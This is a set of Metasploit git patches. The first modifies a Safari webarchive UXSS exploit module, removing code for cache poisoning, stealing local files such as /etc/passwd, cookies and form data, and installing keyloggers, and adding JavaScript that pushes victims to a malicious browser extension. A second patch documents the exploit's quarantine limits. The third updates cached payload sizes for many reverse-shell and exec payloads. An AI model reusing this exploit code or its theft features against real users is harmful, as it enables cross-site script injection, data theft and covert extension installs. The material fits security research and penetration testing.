-      rescue URI::InvalidURIError => e
-        next
-      end
-
-      results = urls_for_site.uniq.map do |url|
-        begin
-          print_status "URL: #{url}"
-          begin
-            script_uri = URI.parse(url)
-            if script_uri.relative?
-              url = page_uri + url
-            end
-            if url.to_s.starts_with? '//'
-              url = "#{page_uri.scheme}:#{url}"
-            end
-            io = URI.parse(url).open
-          rescue URI::InvalidURIError, OpenURI::HTTPError
-            next
-          end
-
-          # parse some HTTP headers and do type coercions
-          last_modified = io.last_modified
-          expires = Time.parse(io.meta['expires']) rescue nil
-          cache_control = io.meta['cache-control'] || ''
-          charset = io.charset
-          etag = io.meta['etag']
-          # lets see if we are able to "poison" the cache for this asset...
-          if (!expires.nil? && Time.now < expires) or
-              (cache_control.length > 0) or   # if asset is cacheable
-              (not last_modified.nil? and last_modified.to_s.length > 0)
-            print_status("Found cacheable #{url}")
-            io.meta.merge(:body => io.read, :url => url)
-          else
-            nil
-          end
-        rescue Errno::ENOENT => e # lots of things can go wrong here.
-          next
-        end
-      end
-      results.compact # remove nils
-    end
-    print_status "Found #{cached_scripts.flatten.length} script(s) that are poisonable."
-    cached_scripts
-  end
-
-  ### HELPERS ###
-
-  # @return [String] the path to send data back to
-  def collect_data_uri
-    path = datastore["URIPATH"]
-    if path.nil? or path.empty?
-      '/grab'
-    elsif path =~ /^\//
-      path
-    else
-      "/#{path}"
-    end
   end
 
   # @return [String] formatted http/https URL of the listener
@@ -820,60 +82,22 @@ class Metasploit3 < Msf::Auxiliary
     proto = (datastore["SSL"] ? "https" : "http")
     myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
     port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
-    "#{proto}://#{myhost}#{port_str}"
+    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
   end
 
-  # @return [String] URL that serves the malicious webarchive
-  def webarchive_download_url
-    datastore["DOWNLOAD_PATH"]
-  end
-
-  # @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen
-  # via the FILE_URLS module option.
-  def interesting_file_urls
-    [
-      'file:///var/log/weekly.out', # may contain usernames
-      'file:///private/var/log/secure.log',
-      'file:///private/var/log/install.log',
-      'file:///private/etc/passwd'
-    ]
-  end
-
-  # @return [String] HTML content that is rendered in the <body> of the webarchive.
   def message
-    "<p>You are being redirected. <a href='#'>Click here if nothing happens</a>.</p>"
+    super + (datastore['INSTALL_EXTENSION'] ? " <a href='javascript:void(0)'>Click here to continue.</a>" + popup_js : '')
   end
 
-  # @return [Array<String>] of URLs provided by the user
-  def urls
-    (datastore['URLS'] || '').split(/\s+/)
+  def popup_js
+    wrap_with_script do
+      %Q|
+        window.onclick = function() {
+          window.open('data:text/html,<script>opener.postMessage("EXT", "*");window.location="#{apple_extension_url}";<\\/script>');
+        };
+      |
+    end
   end
 
-  # @param input [String] the unencoded string
-  # @return [String] input with dangerous chars replaced with xml entities
-  def escape_xml(input)
-    input.to_s.gsub("&", "&amp;").gsub("<", "&lt;")
-              .gsub(">", "&gt;").gsub("'", "&apos;")
-              .gsub("\"", "&quot;")
-  end
 
-  def should_steal_cookies?
-    datastore['STEAL_COOKIES']
-  end
-
-  def should_steal_form?
-    datastore['STEAL_FORM_DATA']
-  end
-
-  def should_steal_files?
-    datastore['STEAL_FILES']
-  end
-
-  def should_pop_up?
-    should_steal_form? and datastore['ENABLE_POPUPS']
-  end
-
-  def should_install_keyloggers?
-    datastore['INSTALL_KEYLOGGERS']
-  end
 end

From 0615d908c4db283b472cf1c1bb035b3d036defc8 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Thu, 13 Aug 2015 23:46:37 -0500
Subject: [PATCH 0975/1013] Update description to explain quarantine effects.

---
 modules/auxiliary/gather/apple_safari_webarchive_uxss.rb | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
index b62865e0ff..98d347f89d 100644
--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -22,6 +22,10 @@ class Metasploit3 < Msf::Auxiliary
         inject cross-domain Javascript (UXSS), silently install a browser
         extension, collect user information, steal the cookie database,
         and steal arbitrary local files.
+
+        When opened on the target machine the webarchive file must not have the
+        quarantine attribute set, as this forces the webarchive to execute in a
+        sandbox.
       },
       'License'        => MSF_LICENSE,
       'Author'         => 'joev',

From 6b1e911041a3d22cfc5cae843ff0c3b4e53b217f Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Thu, 13 Aug 2015 11:10:50 -0500
Subject: [PATCH 0976/1013] Instantiate payload modules so parameter validation
 occurs

Calling .new on payload modules does not perform parameter validation, leading
to a number cached sizes based on invalid parameters. Most notably,
normalization does not occur either, which makes all OptBool params default to
true.
---
 lib/msf/util/payload_cached_size.rb           | 32 ++++++++++++++++---
 modules/payloads/singles/bsd/x64/exec.rb      |  2 +-
 .../singles/bsd/x64/shell_bind_tcp.rb         |  2 +-
 .../singles/bsd/x64/shell_reverse_tcp.rb      |  2 +-
 modules/payloads/singles/bsd/x86/exec.rb      |  2 +-
 modules/payloads/singles/cmd/unix/generic.rb  |  2 +-
 modules/payloads/singles/cmd/unix/reverse.rb  |  2 +-
 .../payloads/singles/cmd/unix/reverse_awk.rb  |  2 +-
 .../payloads/singles/cmd/unix/reverse_lua.rb  |  2 +-
 .../singles/cmd/unix/reverse_netcat_gaping.rb |  2 +-
 .../singles/cmd/unix/reverse_nodejs.rb        |  2 +-
 .../singles/cmd/unix/reverse_openssl.rb       |  2 +-
 .../payloads/singles/cmd/unix/reverse_perl.rb |  2 +-
 .../singles/cmd/unix/reverse_perl_ssl.rb      |  2 +-
 .../singles/cmd/unix/reverse_php_ssl.rb       |  2 +-
 .../singles/cmd/unix/reverse_python_ssl.rb    |  2 +-
 .../payloads/singles/cmd/unix/reverse_ruby.rb |  2 +-
 .../singles/cmd/unix/reverse_ruby_ssl.rb      |  2 +-
 .../cmd/unix/reverse_ssl_double_telnet.rb     |  2 +-
 .../payloads/singles/cmd/unix/reverse_zsh.rb  |  2 +-
 .../payloads/singles/cmd/windows/adduser.rb   |  2 +-
 .../payloads/singles/cmd/windows/generic.rb   |  2 +-
 .../cmd/windows/powershell_bind_tcp.rb        |  2 +-
 .../cmd/windows/powershell_reverse_tcp.rb     |  2 +-
 .../singles/cmd/windows/reverse_lua.rb        |  2 +-
 .../singles/cmd/windows/reverse_perl.rb       |  2 +-
 .../singles/cmd/windows/reverse_powershell.rb |  2 +-
 .../singles/cmd/windows/reverse_ruby.rb       |  2 +-
 modules/payloads/singles/firefox/exec.rb      |  2 +-
 .../singles/java/jsp_shell_reverse_tcp.rb     |  2 +-
 .../singles/java/shell_reverse_tcp.rb         |  2 +-
 modules/payloads/singles/linux/armle/exec.rb  |  2 +-
 modules/payloads/singles/linux/mipsbe/exec.rb |  2 +-
 .../singles/linux/mipsbe/shell_reverse_tcp.rb |  2 +-
 modules/payloads/singles/linux/mipsle/exec.rb |  2 +-
 .../singles/linux/mipsle/shell_reverse_tcp.rb |  2 +-
 modules/payloads/singles/linux/x64/exec.rb    |  4 +--
 modules/payloads/singles/linux/x86/exec.rb    |  2 +-
 .../payloads/singles/linux/x86/read_file.rb   |  2 +-
 .../singles/linux/x86/shell_reverse_tcp2.rb   |  2 +-
 .../singles/nodejs/shell_reverse_tcp.rb       |  2 +-
 .../singles/nodejs/shell_reverse_tcp_ssl.rb   |  2 +-
 modules/payloads/singles/osx/x64/exec.rb      |  2 +-
 .../singles/osx/x64/shell_bind_tcp.rb         |  2 +-
 .../singles/osx/x64/shell_find_tag.rb         |  2 +-
 .../singles/osx/x64/shell_reverse_tcp.rb      |  2 +-
 modules/payloads/singles/osx/x86/exec.rb      |  2 +-
 .../singles/php/meterpreter_reverse_tcp.rb    |  2 +-
 .../singles/python/shell_reverse_tcp.rb       |  2 +-
 .../singles/python/shell_reverse_tcp_ssl.rb   |  2 +-
 .../singles/ruby/shell_reverse_tcp.rb         |  2 +-
 .../singles/ruby/shell_reverse_tcp_ssl.rb     |  2 +-
 .../singles/solaris/sparc/shell_find_port.rb  |  2 +-
 .../singles/solaris/x86/shell_bind_tcp.rb     |  2 +-
 .../singles/solaris/x86/shell_find_port.rb    |  2 +-
 .../singles/solaris/x86/shell_reverse_tcp.rb  |  2 +-
 modules/payloads/singles/windows/adduser.rb   |  2 +-
 .../singles/windows/dns_txt_query_exec.rb     |  2 +-
 .../payloads/singles/windows/download_exec.rb |  2 +-
 modules/payloads/singles/windows/exec.rb      |  2 +-
 .../payloads/singles/windows/loadlibrary.rb   |  2 +-
 .../singles/windows/powershell_bind_tcp.rb    |  2 +-
 .../singles/windows/powershell_reverse_tcp.rb |  2 +-
 modules/payloads/singles/windows/x64/exec.rb  |  2 +-
 .../singles/windows/x64/loadlibrary.rb        |  2 +-
 .../windows/x64/powershell_bind_tcp.rb        |  2 +-
 .../windows/x64/powershell_reverse_tcp.rb     |  2 +-
 modules/payloads/stagers/java/reverse_http.rb |  2 +-
 .../payloads/stagers/java/reverse_https.rb    |  2 +-
 modules/payloads/stagers/java/reverse_tcp.rb  |  2 +-
 .../payloads/stagers/linux/x86/reverse_tcp.rb |  2 +-
 .../stagers/linux/x86/reverse_tcp_uuid.rb     |  2 +-
 .../payloads/stagers/netware/reverse_tcp.rb   |  2 +-
 modules/payloads/stagers/php/reverse_tcp.rb   |  2 +-
 .../payloads/stagers/php/reverse_tcp_uuid.rb  |  2 +-
 .../payloads/stagers/python/reverse_tcp.rb    |  2 +-
 .../stagers/python/reverse_tcp_uuid.rb        |  2 +-
 .../payloads/stagers/windows/reverse_http.rb  |  2 +-
 .../windows/reverse_http_proxy_pstore.rb      |  2 +-
 .../payloads/stagers/windows/reverse_https.rb |  2 +-
 .../stagers/windows/reverse_https_proxy.rb    |  2 +-
 .../stagers/windows/x64/reverse_http.rb       |  2 +-
 .../stagers/windows/x64/reverse_https.rb      |  2 +-
 spec/modules/payloads_spec.rb                 |  6 ++--
 .../payload_cached_size_is_consistent.rb      | 29 ++++++++++++++++-
 tools/update_payload_cached_sizes.rb          |  7 ++--
 86 files changed, 146 insertions(+), 94 deletions(-)

diff --git a/lib/msf/util/payload_cached_size.rb b/lib/msf/util/payload_cached_size.rb
index f349be43ca..e299739664 100644
--- a/lib/msf/util/payload_cached_size.rb
+++ b/lib/msf/util/payload_cached_size.rb
@@ -14,6 +14,27 @@ module Util
 
 class PayloadCachedSize
 
+  @opts = {
+    'Format'      => 'raw',
+    'Options'     => {
+      'CPORT' => 4444,
+      'LPORT' => 4444,
+      'LHOST' => '255.255.255.255',
+      'KHOST' => '255.255.255.255',
+      'AHOST' => '255.255.255.255',
+      'CMD' => '/bin/sh',
+      'URL' => 'http://a.com',
+      'PATH' => '/',
+      'BUNDLE' => 'data/isight.bundle',
+      'DLL' => 'external/source/byakugan/bin/XPSP2/detoured.dll',
+      'RC4PASSWORD' => 'Metasploit',
+      'DNSZONE' => 'corelan.eu',
+      'PEXEC' => '/bin/sh'
+    },
+    'Encoder'     => nil,
+    'DisableNops' => true
+  }
+
   # Insert a new CachedSize value into the text of a payload module
   #
   # @param data [String] The source code of a payload module
@@ -60,7 +81,7 @@ class PayloadCachedSize
   # @return [Fixnum]
   def self.compute_cached_size(mod)
     return ":dynamic" if is_dynamic?(mod)
-    return mod.new.size
+    return mod.generate_simple(@opts).size
   end
 
   # Determines whether a payload generates a static sized output
@@ -69,8 +90,9 @@ class PayloadCachedSize
   # @param generation_count [Fixnum] The number of iterations to use to
   #   verify that the size is static.
   # @return [Fixnum]
-  def self.is_dynamic?(mod,generation_count=5)
-    [*(1..generation_count)].map{|x| mod.new.size}.uniq.length != 1
+  def self.is_dynamic?(mod, generation_count=5)
+    [*(1..generation_count)].map{|x|
+      mod.generate_simple(@opts).size}.uniq.length != 1
   end
 
   # Determines whether a payload's CachedSize is up to date
@@ -78,9 +100,9 @@ class PayloadCachedSize
   # @param mod [Msf::Payload] The class of the payload module to update
   # @return [Boolean]
   def self.is_cached_size_accurate?(mod)
-    return true if mod.dynamic_size?
+    return true if mod.dynamic_size? && is_dynamic?(mod)
     return false if mod.cached_size.nil?
-    mod.cached_size == mod.new.size
+    mod.cached_size == mod.generate_simple(@opts).size
   end
 
 end
diff --git a/modules/payloads/singles/bsd/x64/exec.rb b/modules/payloads/singles/bsd/x64/exec.rb
index fb391f6b3d..150d96f356 100644
--- a/modules/payloads/singles/bsd/x64/exec.rb
+++ b/modules/payloads/singles/bsd/x64/exec.rb
@@ -17,7 +17,7 @@ require 'msf/core'
 ###
 module Metasploit3
 
-  CachedSize = 23
+  CachedSize = 31
 
   include Msf::Payload::Single
   include Msf::Payload::Bsd
diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb
index ca682e1e08..9528c88233 100644
--- a/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb
@@ -40,7 +40,7 @@ module Metasploit3
 
   # build the shellcode payload dynamically based on the user-provided CMD
   def generate
-    cmd  = (datastore['CMD'] || '') << "\x00"
+    cmd  = (datastore['CMD'] || '') + "\x00"
     port = [datastore['LPORT'].to_i].pack('n')
     call = "\xe8" + [cmd.length].pack('V')
     payload =
diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
index 0c87216d8b..fece7de959 100644
--- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
@@ -49,7 +49,7 @@ module Metasploit3
       raise ArgumentError, "LHOST must be in IPv4 format."
     end
 
-    cmd  = (datastore['CMD'] || '') << "\x00"
+    cmd  = (datastore['CMD'] || '') + "\x00"
     port = [datastore['LPORT'].to_i].pack('n')
     ipaddr = [lhost.split('.').inject(0) {|t,v| (t << 8 ) + v.to_i}].pack("N")
 
diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb
index 552ff37273..eee7aebbd9 100644
--- a/modules/payloads/singles/bsd/x86/exec.rb
+++ b/modules/payloads/singles/bsd/x86/exec.rb
@@ -17,7 +17,7 @@ require 'msf/core'
 ###
 module Metasploit3
 
-  CachedSize = 16
+  CachedSize = 24
 
   include Msf::Payload::Single
   include Msf::Payload::Bsd
diff --git a/modules/payloads/singles/cmd/unix/generic.rb b/modules/payloads/singles/cmd/unix/generic.rb
index a1e283951a..3b982b201f 100644
--- a/modules/payloads/singles/cmd/unix/generic.rb
+++ b/modules/payloads/singles/cmd/unix/generic.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 0
+  CachedSize = 8
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse.rb b/modules/payloads/singles/cmd/unix/reverse.rb
index 9333695bc1..2ef164ebd7 100644
--- a/modules/payloads/singles/cmd/unix/reverse.rb
+++ b/modules/payloads/singles/cmd/unix/reverse.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 100
+  CachedSize = 130
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_awk.rb b/modules/payloads/singles/cmd/unix/reverse_awk.rb
index 10a4d1c497..05402d4153 100644
--- a/modules/payloads/singles/cmd/unix/reverse_awk.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_awk.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 95
+  CachedSize = 110
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_lua.rb b/modules/payloads/singles/cmd/unix/reverse_lua.rb
index f95478851e..95bbd8dd3c 100644
--- a/modules/payloads/singles/cmd/unix/reverse_lua.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_lua.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 209
+  CachedSize = 224
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
index d20797943d..5040d2cba9 100644
--- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 20
+  CachedSize = 35
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
index cf50ea5057..1d3dd09b0f 100644
--- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 1911
+  CachedSize = 1971
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS
diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl.rb b/modules/payloads/singles/cmd/unix/reverse_openssl.rb
index 30f5ed8241..d89af6ad67 100644
--- a/modules/payloads/singles/cmd/unix/reverse_openssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_openssl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 152
+  CachedSize = 182
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_perl.rb b/modules/payloads/singles/cmd/unix/reverse_perl.rb
index b3eb2133dd..0aafd22aba 100644
--- a/modules/payloads/singles/cmd/unix/reverse_perl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 219
+  CachedSize = 234
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
index ce969a1e4a..8e134bd9de 100644
--- a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 129
+  CachedSize = 144
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
index cdf9dedfe6..08a8f93942 100644
--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 117
+  CachedSize = 132
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
index fa9db69b3d..b1ab1b26f4 100644
--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 567
+  CachedSize = 587
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby.rb b/modules/payloads/singles/cmd/unix/reverse_ruby.rb
index f29140422c..502efcbb0c 100644
--- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 118
+  CachedSize = 133
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
index 9a28b0724b..009d0f00aa 100644
--- a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 170
+  CachedSize = 185
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
index e6b90cccc7..bdf31d2045 100644
--- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 106
+  CachedSize = 136
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_zsh.rb b/modules/payloads/singles/cmd/unix/reverse_zsh.rb
index c0c9101163..9127052406 100644
--- a/modules/payloads/singles/cmd/unix/reverse_zsh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_zsh.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 95
+  CachedSize = 110
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/windows/adduser.rb b/modules/payloads/singles/cmd/windows/adduser.rb
index 0c7c09b23a..3a74d57100 100644
--- a/modules/payloads/singles/cmd/windows/adduser.rb
+++ b/modules/payloads/singles/cmd/windows/adduser.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 258
+  CachedSize = 97
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/windows/generic.rb b/modules/payloads/singles/cmd/windows/generic.rb
index 0b8a394f30..047dc0bfc4 100644
--- a/modules/payloads/singles/cmd/windows/generic.rb
+++ b/modules/payloads/singles/cmd/windows/generic.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 0
+  CachedSize = 8
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
index 0bd2d0d1b5..b33a5a6741 100644
--- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/core/handler/bind_tcp'
 
 module Metasploit3
 
-  CachedSize = 1510
+  CachedSize = 1518
 
   include Msf::Payload::Single
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
index 0e6d28cff5..5174312512 100644
--- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 
 module Metasploit3
 
-  CachedSize = 1518
+  CachedSize = 1526
 
   include Msf::Payload::Single
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/cmd/windows/reverse_lua.rb b/modules/payloads/singles/cmd/windows/reverse_lua.rb
index dc52854ffc..fbe52645ad 100644
--- a/modules/payloads/singles/cmd/windows/reverse_lua.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_lua.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 209
+  CachedSize = 224
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb
index b5572c3bc6..ff007384f0 100644
--- a/modules/payloads/singles/cmd/windows/reverse_perl.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 133
+  CachedSize = 148
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/windows/reverse_powershell.rb b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
index bf998753f7..510f4b5df5 100644
--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 1189
+  CachedSize = 1204
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/cmd/windows/reverse_ruby.rb b/modules/payloads/singles/cmd/windows/reverse_ruby.rb
index 5b0f4d8f2b..fa61454995 100644
--- a/modules/payloads/singles/cmd/windows/reverse_ruby.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_ruby.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 111
+  CachedSize = 126
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb
index 436deb5031..9f3dcbc1d5 100644
--- a/modules/payloads/singles/firefox/exec.rb
+++ b/modules/payloads/singles/firefox/exec.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = :dynamic
+  CachedSize = 1019
 
   include Msf::Payload::Single
   include Msf::Payload::Firefox
diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
index f45d8acbf8..e5201b9a61 100644
--- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 0
+  CachedSize = 1501
 
   include Msf::Payload::Single
   include Msf::Payload::JSP
diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb
index ca47412e51..183aadcd71 100644
--- a/modules/payloads/singles/java/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/java/shell_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 7748
+  CachedSize = 7761
 
   include Msf::Payload::Single
   include Msf::Payload::Java
diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb
index 0b3bd3c7ba..88c3f9e5b9 100644
--- a/modules/payloads/singles/linux/armle/exec.rb
+++ b/modules/payloads/singles/linux/armle/exec.rb
@@ -15,7 +15,7 @@ require 'msf/core'
 ###
 module Metasploit3
 
-  CachedSize = 22
+  CachedSize = 29
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb
index fabc01f2e8..0d7f26d720 100644
--- a/modules/payloads/singles/linux/mipsbe/exec.rb
+++ b/modules/payloads/singles/linux/mipsbe/exec.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 48
+  CachedSize = 52
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
index 141d9e37d3..36692d22dc 100644
--- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
-  CachedSize = 0
+  CachedSize = 184
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb
index 4fc68ab0aa..a2b1440a21 100644
--- a/modules/payloads/singles/linux/mipsle/exec.rb
+++ b/modules/payloads/singles/linux/mipsle/exec.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 module Metasploit3
 
-  CachedSize = 48
+  CachedSize = 52
 
   include Msf::Payload::Single
   include Msf::Payload::Linux
diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
